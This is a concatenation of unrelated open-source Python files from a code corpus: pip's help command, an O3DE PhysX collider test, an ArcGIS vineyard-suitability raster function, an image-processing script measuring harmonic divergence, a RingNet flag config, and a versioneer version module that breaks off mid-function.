print("The world_size is %d" % dist.get_world_size())
# The world_size is 4
"""
return _get_global_parallel_env().world_size
|
the-stack_0_12439 |
from pip._internal.cli.base_command import Command
from pip._internal.cli.status_codes import SUCCESS
from pip._internal.exceptions import CommandError
class HelpCommand(Command):
"""Show help for commands"""
name = 'help'
usage = """
%prog <command>"""
summary = 'Show help for commands.'
ignore_require_venv = True
def run(self, options, args):
from pip._internal.commands import commands_dict, get_similar_commands
try:
# 'pip help' with no args is handled by pip.__init__.parseopt()
cmd_name = args[0] # the command we need help for
except IndexError:
return SUCCESS
if cmd_name not in commands_dict:
guess = get_similar_commands(cmd_name)
msg = ['unknown command "%s"' % cmd_name]
if guess:
msg.append('maybe you meant "%s"' % guess)
raise CommandError(' - '.join(msg))
command = commands_dict[cmd_name]()
command.parser.print_help()
return SUCCESS
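# Hedged illustration (not part of pip): the "maybe you meant" hint above relies
# on fuzzy-matching the typo against the known command names. difflib sketches
# the same idea; pip's own get_similar_commands may differ in detail.
def _example_guess_command(typo, known=("install", "uninstall", "download", "freeze", "list", "help")):
    import difflib
    matches = difflib.get_close_matches(typo, known, n=1)
    return matches[0] if matches else None
# _example_guess_command("instal") -> "install"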
|
the-stack_0_12441 | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Test case ID : C14861501
Test Case Title : Verify PxMesh is auto-assigned when Collider component is added after Rendering Mesh component
"""
# fmt: off
class Tests():
create_entity = ("Created test entity", "Failed to create test entity")
mesh_added = ("Added Mesh component", "Failed to add Mesh component")
physx_collider_added = ("Added PhysX Collider component", "Failed to add PhysX Collider component")
assign_mesh_asset = ("Assigned Mesh asset to Mesh component", "Failed to assign mesh asset to Mesh component")
automatic_shape_change = ("Shape was changed automatically", "Shape failed to change automatically")
# fmt: on
def C14861501_PhysXCollider_RenderMeshAutoAssigned():
"""
Summary:
    Create an entity with a Mesh component and assign a render mesh to it. Add a PhysX Collider component
    and verify that the physics mesh asset is auto-assigned.
Expected Behavior:
The physics asset in PhysX Collider component is auto-assigned
Test Steps:
1) Load the empty level
2) Create an entity
3) Add Mesh component
4) Assign a render mesh asset to Mesh component (the fbx mesh having both Static mesh and PhysX collision Mesh)
5) Add PhysX Collider component
6) The physics asset in PhysX Collider component is auto-assigned.
Note:
- This test file must be called from the Open 3D Engine Editor command terminal
- Any passed and failed tests are written to the Editor.log file.
Parsing the file or running a log_monitor are required to observe the test results.
:return: None
"""
# Builtins
import os
# Helper Files
import ImportPathHelper as imports
imports.init()
from editor_python_test_tools.editor_entity_utils import EditorEntity as Entity
from editor_python_test_tools.utils import Report
from editor_python_test_tools.utils import TestHelper as helper
from asset_utils import Asset
# Asset paths
STATIC_MESH = os.path.join("assets", "c14861501_physxcollider_rendermeshautoassigned", "spherebot", "r0-b_body.azmodel")
PHYSX_MESH = os.path.join(
"assets", "c14861501_physxcollider_rendermeshautoassigned", "spherebot", "r0-b_body.pxmesh"
)
helper.init_idle()
# 1) Load the empty level
helper.open_level("Physics", "Base")
# 2) Create an entity
test_entity = Entity.create_editor_entity("test_entity")
Report.result(Tests.create_entity, test_entity.id.IsValid())
# 3) Add Mesh component
mesh_component = test_entity.add_component("Mesh")
Report.result(Tests.mesh_added, test_entity.has_component("Mesh"))
# 4) Assign a render mesh asset to Mesh component (the fbx mesh having both Static mesh and PhysX collision Mesh)
mesh_asset = Asset.find_asset_by_path(STATIC_MESH)
mesh_component.set_component_property_value("Controller|Configuration|Mesh Asset", mesh_asset.id)
mesh_asset.id = mesh_component.get_component_property_value("Controller|Configuration|Mesh Asset")
Report.result(Tests.assign_mesh_asset, mesh_asset.get_path() == STATIC_MESH.replace(os.sep, "/"))
# 5) Add PhysX Collider component
test_component = test_entity.add_component("PhysX Collider")
Report.result(Tests.physx_collider_added, test_entity.has_component("PhysX Collider"))
# 6) The physics asset in PhysX Collider component is auto-assigned.
asset_id = test_component.get_component_property_value("Shape Configuration|Asset|PhysX Mesh")
test_asset = Asset(asset_id)
Report.result(Tests.automatic_shape_change, test_asset.get_path() == PHYSX_MESH.replace(os.sep, "/"))
if __name__ == "__main__":
import ImportPathHelper as imports
imports.init()
from editor_python_test_tools.utils import Report
Report.start_test(C14861501_PhysXCollider_RenderMeshAutoAssigned)
|
the-stack_0_12442 | import numpy as np
class VineyardAnalysis():
def __init__(self):
self.name = "Vineyard Suitability Analysis Function"
self.description = "This function computes vineyard suitability given elevation, slope, aspect, and soil-type rasters."
def getParameterInfo(self):
return [
{
'name': 'elevation',
'dataType': 'raster',
'value': None,
'required': True,
'displayName': 'Elevation Raster',
'description': "The primary single-band raster where pixel values represent elevation in meters."
},
{
'name': 'slope',
'dataType': 'raster',
'value': None,
'required': True,
'displayName': 'Slope Raster',
'description': "A single-band raster where pixel values represent slope."
},
{
'name': 'aspect',
'dataType': 'raster',
'value': None,
'required': True,
'displayName': 'Aspect Raster',
'description': "A single-band raster where pixel values represent aspect."
},
{
'name': 'soiltype',
'dataType': 'raster',
'value': None,
'required': False,
'displayName': 'Soil Type Raster',
'description': "A single-band thematic raster where pixel values represent soil type."
},
]
def getConfiguration(self, **scalars):
return {
'inheritProperties': 2 | 4 | 8, # inherit all but the pixel type from the input raster
'invalidateProperties': 2 | 4 | 8, # reset any statistics and histogram that might be held by the parent dataset (because this function modifies pixel values).
'inputMask': True # We need the input raster mask in .updatePixels().
}
def updateRasterInfo(self, **kwargs):
kwargs['output_info']['bandCount'] = 1
kwargs['output_info']['pixelType'] = 'u1'
kwargs['output_info']['statistics'] = ({'minimum': 0, 'maximum': 3}, )
kwargs['output_info']['noData'] = np.array([0], 'u1')
return kwargs
def updatePixels(self, tlc, shape, props, **pixelBlocks):
elev = np.array(pixelBlocks['elevation_pixels'], 'f4')
slope = np.array(pixelBlocks['slope_pixels'], 'f4')
aspect = np.array(pixelBlocks['aspect_pixels'], 'f4')
#soil = np.array(pixelBlocks['soiltype_pixels'], 'i8')
E = (elev > 30).astype('u1') & (elev < 400).astype('u1')
S = (slope > 5).astype('u1') & (slope < 60).astype('u1')
A = (aspect > 0).astype('u1') & (aspect < 200).astype('u1')
pixelBlocks['output_pixels'] = (E + S + A).astype(props['pixelType'])
return pixelBlocks
def updateKeyMetadata(self, names, bandIndex, **keyMetadata):
if bandIndex == -1:
keyMetadata['datatype'] = 'Scientific'
keyMetadata['variable'] = 'VineyardSuitability'
elif bandIndex == 0:
keyMetadata['wavelengthmin'] = None # reset inapplicable band-specific key metadata
keyMetadata['wavelengthmax'] = None
keyMetadata['bandname'] = 'VineyardSuitability'
return keyMetadata
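# Hedged standalone sketch (not part of the raster function): the scoring in
# updatePixels is three boolean masks summed per pixel, giving 0 (unsuitable) to
# 3 (all criteria met). The tiny arrays below are made up purely to show that.
def _example_suitability_score():
    elev = np.array([[10.0, 120.0], [500.0, 250.0]])
    slope = np.array([[2.0, 20.0], [30.0, 45.0]])
    aspect = np.array([[10.0, 150.0], [250.0, 90.0]])
    E = (elev > 30) & (elev < 400)
    S = (slope > 5) & (slope < 60)
    A = (aspect > 0) & (aspect < 200)
    return E.astype('u1') + S.astype('u1') + A.astype('u1')  # values in 0..3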
|
the-stack_0_12443 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 19 16:54:54 2019
@author: similarities
"""
import matplotlib.pyplot as plt
import numpy as np
import os
class FwhmImageProcessing:
def __init__(self, filename, lambda_fundamental, maximum_harmonic, harmonic_number):
self.filename = filename
self.filedescription = self.filename[31:42] + '_' + self.filename[-6:-4]
self.y_min = 0
self.y_max = 2048
self.x_min = 150
self.x_max = 1300
self.picture = np.empty([])
self.harmonic_selected = harmonic_number
self.x_backsubstracted = np.empty([2048, 2048])
self.lambda_fundamental = lambda_fundamental
self.line_out = np.zeros([self.y_max, 1])
self.line_out_x = np.arange(self.x_min, self.x_max)
self.calibration_to_msr = 17.5 / 2048
self.full_divergence = 17.5
self.normalization_factor_mrad = np.zeros([20, 1])
self.border_up, self.border_down = self.energy_range()
self.maximum_harmonic = maximum_harmonic
self.result_array = np.zeros([self.maximum_harmonic, 5])
def open_file(self):
self.picture = plt.imread(self.filename)
return self.picture
def background_y(self):
back_mean = np.mean(self.picture[:, 1600:1700], axis=1)
for x in range(0, self.y_max):
self.x_backsubstracted[::, x] = self.picture[::, x] - back_mean[x]
self.background_x()
plt.figure(1)
# plt.ylim(100, 1000)
plt.imshow(self.x_backsubstracted)
plt.vlines(self.x_min, 0, 2048)
plt.vlines(self.x_max, 0, 2048)
return self.x_backsubstracted
def background_x(self):
back_mean = np.mean(self.picture[1880:1948, :], axis=0)
for x in range(0, 2048):
self.x_backsubstracted[x, ::] = self.picture[x, ::] - back_mean[x]
return self.x_backsubstracted
def energy_range(self):
print(self.harmonic_selected, ':')
previous_harmonic = self.lambda_fundamental / (self.harmonic_selected - 0.3)
next_harmonic = self.lambda_fundamental / (self.harmonic_selected + 0.3)
self.border_up = np.int(self.nm_in_px(previous_harmonic))
self.border_down = np.int(self.nm_in_px(next_harmonic))
print(self.border_up, self.border_down, "ROI in px")
self.pixel_range = np.int(self.border_down - self.border_up)
print(self.pixel_range, 'ROI in pixel range')
self.plot_roi_on_image()
return self.border_up, self.border_down
def nm_in_px(self, px_in):
return int(4.71439193e-01 * px_in ** 2 - 1.06651902e+02 * px_in + 4.29603367e+03)
def plot_roi_on_image(self):
plt.figure(1)
plt.hlines(self.border_up, xmin=0, xmax=2048, color="w", linewidth=0.1)
plt.hlines(self.border_down, xmin=0, xmax=2048, color="g", linewidth=0.1)
def sum_over_pixel_range_y(self):
self.line_out = self.x_backsubstracted[self.border_up: self.border_down, ::]
self.line_out = np.sum(self.line_out, axis=0)
self.line_out = self.line_out[self.x_min:self.x_max]
return self.line_out
def correction_background(self, value):
self.line_out[::] = self.line_out[::] - value
return self.line_out
def integrated_signal_in_lineout(self):
integrated = np.sum(self.line_out[::])
return integrated
def plot_x_y(self, x, y, name, plot_number, axis_x_name, axis_y_name):
plt.figure(plot_number)
plt.plot(x, y, label=name)
plt.xlabel(str(axis_x_name))
plt.ylabel(str(axis_y_name))
plt.legend()
def calibrate_px_to_msr(self, array_x):
array_x[::] = array_x[::] * self.calibration_to_msr
return array_x
def prepare_for_stepfunction(self):
self.sum_over_pixel_range_y()
maximum = np.amax(self.line_out[::])
minimum = np.amin(self.line_out[::])
if minimum < 0:
self.correction_background(minimum)
maximum = np.amax(self.line_out[::])
minimum = np.amin(self.line_out[::])
half_max = (maximum - minimum) / 2
# self.plot_x_y(self.line_out_x, self.line_out, 'linout_corrected', 2, 'px', 'counts')
self.plot_x_y(self.line_out_x, self.line_out, str(self.harmonic_selected), 2, 'px', 'counts')
return half_max
def step_function_for_fwhm(self):
half_max = self.prepare_for_stepfunction()
# width of step function is FWHM
d = np.sign(half_max - self.line_out[::]) - 1
self.line_out_x = self.calibrate_px_to_msr(self.line_out_x)
self.plot_x_y(self.line_out_x, d, 'stepfunction', 3, 'mrad', 'value')
self.line_out_x = np.arange(self.x_min, self.x_max)
result_FWHM = 1. * self.calibration_to_msr * (np.amax(np.nonzero(d)) - np.amin(np.nonzero(d)))
return result_FWHM
def px_in_nm(self, px_number):
return 1.24679344e-06 * px_number ** 2 - 1.65566701e-02 * px_number + 5.22598053e+01
def delta_energy(self):
delta = self.px_in_nm(self.border_up) - self.px_in_nm(self.border_down)
energy_nm = (self.lambda_fundamental / self.harmonic_selected)
delta_vs_energy = delta / energy_nm
return energy_nm, delta_vs_energy
def batch_over_N(self):
for x in range(self.harmonic_selected, self.maximum_harmonic):
self.result_array[x, 0] = x
self.harmonic_selected = x
self.energy_range()
self.result_array[x, 1] = self.step_function_for_fwhm()
self.result_array[x, 2] = np.sum(self.line_out[::])
self.result_array[x, 4], self.result_array[x, 3] = self.delta_energy()
# clean for empty entries
self.result_array = np.delete(self.result_array, np.where(~self.result_array.any(axis=1))[0],
axis=0)
self.plot_scatter(self.result_array[::, 0], self.result_array[::, 1], self.filedescription,
'harmonic number N', 'divergence in mrad', 5)
self.save_data()
return self.result_array
def plot_scatter(self, x, y, name, axis_name_x, axis_name_y, plot_number):
plt.figure(plot_number)
plt.scatter(x, y, label=name)
plt.xlabel(axis_name_x)
plt.ylabel(axis_name_y)
#plt.legend()
def prepare_header(self):
self.integrated_signal_in_lineout()
self.delta_energy()
# insert header line and change index
header_names = (['harmonic_number', 'mrad', 'integrated_counts_in_delta_E', 'harmonic_in_nm', 'delta_E/E'])
parameter_info = (
['fundamental_nm:', str(self.lambda_fundamental), 'pixel_range:', str(self.border_down-self.border_up), 'xxxx'])
return np.vstack((header_names, self.result_array, parameter_info))
def save_data(self):
result = self.prepare_header()
plt.figure(1)
plt.savefig(self.filedescription + "_raw_roi_" + ".png", bbox_inches="tight", dpi=1000)
plt.figure(2)
plt.savefig(self.filedescription + "_integrated_lineout" + ".png", bbox_inches="tight", dpi=1000)
plt.figure(5)
plt.savefig(self.filedescription + "_div_mrad_FWHM" + ".png", bbox_inches="tight", dpi=1000)
print('saved data')
np.savetxt(self.filedescription + ".txt", result, delimiter=' ',
header='string', comments='',
fmt='%s')
def get_file_list(path_picture):
tif_files = []
counter = 0
for file in os.listdir(path_picture):
print(file)
try:
if file.endswith(".tif"):
tif_files.append(str(file))
counter = counter + 1
else:
print("only other files found")
except Exception as e:
raise e
print("no files found here")
return tif_files
def process_files(my_files, path):
for x in range(63, 64):
file = path +'/'+ my_files[x]
Processing_Picture = FwhmImageProcessing(file, 805 , 30, 17)
Processing_Picture.open_file()
Processing_Picture.background_y()
Processing_Picture.batch_over_N()
Processing_Picture.save_data()
plt.close(1)
plt.close(2)
plt.close(5)
my_files = get_file_list('rotated_20190123')
process_files(my_files, 'rotated_20190123')
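# Hedged sanity-check sketch (not in the original script): nm_in_px and px_in_nm
# are fitted polynomials that should act as approximate inverses, so mapping a
# wavelength to a pixel position and back should land close to the start. Neither
# method touches instance state, so a bare instance is enough for the check.
def _example_calibration_roundtrip(wavelength_nm=805.0 / 17):
    probe = FwhmImageProcessing.__new__(FwhmImageProcessing)  # skip __init__ (file I/O)
    px = probe.nm_in_px(wavelength_nm)
    return wavelength_nm, probe.px_in_nm(px)  # both values should nearly agree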
|
the-stack_0_12445 | """
Author: Soubhik Sanyal
Copyright (c) 2019, Soubhik Sanyal
All rights reserved.
Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG) is holder of all proprietary rights on this
computer program.
You can only use this computer program if you have closed a license agreement with MPG or you get the right to use
the computer program from someone who is authorized to grant you that right.
Any use of the computer program without a valid license is prohibited and liable to prosecution.
Copyright 2019 Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG). acting on behalf of its
Max Planck Institute for Intelligent Systems and the Max Planck Institute for Biological Cybernetics.
All rights reserved.
More information about RingNet is available at https://ringnet.is.tue.mpg.de.
based on github.com/akanazawa/hmr
"""
# Sets default args
# Note all data format is NHWC because slim resnet wants NHWC.
import sys
from absl import flags
PRETRAINED_MODEL = './model.pkl'
flags.DEFINE_string('img_path', '/training_set/NoW_Dataset/final_release_version/iphone_pictures/FaMoS_180424_033335_TA/selfie/IMG_0092.jpg', 'Image to run')
flags.DEFINE_string('out_folder', './output',
'The output path to store images')
flags.DEFINE_boolean('save_obj_file', True,
'If true the output meshes will be saved')
flags.DEFINE_boolean('save_flame_parameters', True,
'If true the camera and flame parameters will be saved')
flags.DEFINE_boolean('neutralize_expression', True,
                    'If true the expression parameters will be neutralized (set to zero) before export')
flags.DEFINE_boolean('save_texture', True,
'If true the texture map will be stored')
flags.DEFINE_string('flame_model_path', './flame_model/generic_model.pkl', 'path to the neutral FLAME model')
flags.DEFINE_string('flame_texture_data_path', './flame_model/texture_data_512.npy', 'path to the FLAME texture data')
flags.DEFINE_string('load_path', PRETRAINED_MODEL, 'path to trained model')
flags.DEFINE_integer('batch_size', 1,
'Fixed to 1 for inference')
# Don't change if testing:
flags.DEFINE_integer('img_size', 224,
'Input image size to the network after preprocessing')
flags.DEFINE_string('data_format', 'NHWC', 'Data format')
# Flame parameters:
flags.DEFINE_integer('pose_params', 6,
'number of flame pose parameters')
flags.DEFINE_integer('shape_params', 100,
'number of flame shape parameters')
flags.DEFINE_integer('expression_params', 50,
'number of flame expression parameters')
def get_config():
config = flags.FLAGS
config(sys.argv)
return config
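# Hedged usage sketch (not part of the original file): get_config() parses
# sys.argv through absl flags, so a caller typically overrides paths on the
# command line and then reads plain attributes. Script name and flag values
# below are illustrative.
#
#   python demo.py --img_path ./input/face.jpg --out_folder ./output
def _example_print_defaults():
    config = get_config()
    print(config.img_size, config.shape_params, config.expression_params)  # 224 100 50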
|
the-stack_0_12446 |
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "resp2/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
